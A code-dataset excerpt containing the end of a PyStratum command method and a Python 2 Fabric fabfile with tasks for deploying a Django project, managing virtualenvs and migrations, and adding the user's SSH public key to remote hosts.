# ------------------------------------------------------------------------------------------------------------------
def handle(self) -> int:
"""
Executes the actual Stratum program.
"""
self.output = PyStratumStyle(self.input, self.output)
command = self.get_application().find('constants')
ret = command.execute(self.input, self.output)
if ret:
return ret
command = self.get_application().find('loader')
ret = command.execute(self.input, self.output)
if ret:
return ret
command = self.get_application().find('wrapper')
ret = command.execute(self.input, self.output)
self.output.writeln('')
return ret
# ----------------------------------------------------------------------------------------------------------------------
| mit | 4,108,116,907,794,490,400 | 29.230769 | 120 | 0.465649 | false | 5.154098 | false | false | false |
twistsys/basic-project | fabfile.py | 1 | 5267 | import os
import deploy as deploy_conf
from fabric.api import env, task, roles, run, execute, sudo
from fabric import colors
from fabric.utils import abort
import inspect
################################################################################
# Tasks for managing Deploy Targets
################################################################################
@task(alias='t')
def target(target_name):
"""Select the deploy target.
"""
if not target_name in deploy_conf.TARGETS:
abort('Deploy target "%s" not found.' % target_name)
target_class = deploy_conf.TARGETS[target_name]
target = target_class()
env['deploy_target'] = target
env.roledefs.update(target.get_roles())
print (colors.green("Selected deploy target ")
+ colors.green(target_name, bold=True))
@task
def list_targets():
"""List all the available targets
"""
targets = deploy_conf.TARGETS.keys()
print 'Available targets:'
print '\n'.join(targets)
################################################################################
# Auxiliary tasks
################################################################################
@task()
@roles('app', 'db', 'static')
def git_pull():
"""Pull changes to the repository of all remote hosts.
"""
env.deploy_target.git_pull()
@task
@roles('app', 'db', 'static')
def setup_repository(force=False):
"""Clone the remote repository, creating the SSH keys if necessary.
"""
env.deploy_target.setup_repository(force)
@task
@roles('app', 'db', 'static')
def setup_virtualenv(force=False):
"""Create the virtualenv and install the packages from the requirements
file.
"""
env.deploy_target.setup_virtualenv(force)
env.deploy_target.install_virtualenv(update=False)
@task
@roles('app', 'db', 'static')
def update_virtualenv():
"""Update the virtualenv according to the requirements file.
"""
env.deploy_target.install_virtualenv(update=True)
################################################################################
# Main Tasks
################################################################################
@task
@roles('app')
def restart_app():
"""Restart the application server.
"""
env.deploy_target.restart_app()
@task()
def deploy():
"""Deploy the application to the selected deploy target.
"""
# Push local changes to central repository
env.deploy_target.git_push()
# Pull changes on remote repositories
execute(git_pull)
# Restart application server
execute(restart_app)
@task
@roles('db')
def migrate(syncdb=False, fake=False):
"""Execute syncdb and migrate in the database hosts.
"""
env.deploy_target.db_migrate(syncdb, fake)
@task
@roles('static')
def collectstatic():
"""Execute collectstatic on static file hosts.
"""
env.deploy_target.db_collectstatic()
@task()
def setup():
"""Initial setup of the remote hosts.
"""
# Set up git repository
execute(setup_repository)
# Set up virtualenv
execute(setup_virtualenv)
# Sync and Migrate database
execute(migrate, True, True)
# Collect static files
execute(collectstatic)
# Restart application servers
execute(restart_app)
################################################################################
# Tasks for manually executing manage.py commands
################################################################################
@task
@roles('app')
def app_manage(arguments):
"""Execute the given manage.py command in Aplication hosts.
"""
env.deploy_target.run_django_manage(arguments)
@task
@roles('db')
def db_manage(arguments):
"""Execute the given manage.py command in Database hosts.
"""
env.deploy_target.run_django_manage(arguments)
@task
@roles('static')
def static_manage(arguments):
"""Execute the given manage.py command in Static File hosts.
"""
env.deploy_target.run_django_manage(arguments)
################################################################################
# Auxiliary tasks for helping with SSH public key authentication
################################################################################
def _read_key_file(key_file):
"""Helper function that returns your SSH public from the given filename.
"""
key_file = os.path.expanduser(key_file)
if not key_file.endswith('pub'):
raise RuntimeWarning('Trying to push non-public part of key pair')
with open(key_file) as f:
return f.read().strip()
@task
def push_key(keyfile='~/.ssh/id_rsa.pub'):
"""Adds your private key to the list of authorized keys to log into the
remote account.
"""
key = _read_key_file(keyfile)
run('mkdir -p ~/.ssh && chmod 0700 ~/.ssh')
run("echo '" + key + "' >> ~/.ssh/authorized_keys")
@task
def push_key_sudo(user,keyfile='~/.ssh/id_rsa.pub'):
"""Adds your private key to the list of authorized keys for another
account on the remote host, via sudo.
"""
key = _read_key_file(keyfile)
sudo('mkdir -p ~%(user)s/.ssh && chmod 0700 ~%(user)s/.ssh'%{'user': user},
user=user)
sudo("echo '" + key + "' >> ~%(user)s/.ssh/authorized_keys"%{'user': user},
user=user)
| bsd-3-clause | -6,034,000,824,672,719,000 | 27.781421 | 80 | 0.562369 | false | 4.240741 | false | false | false |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.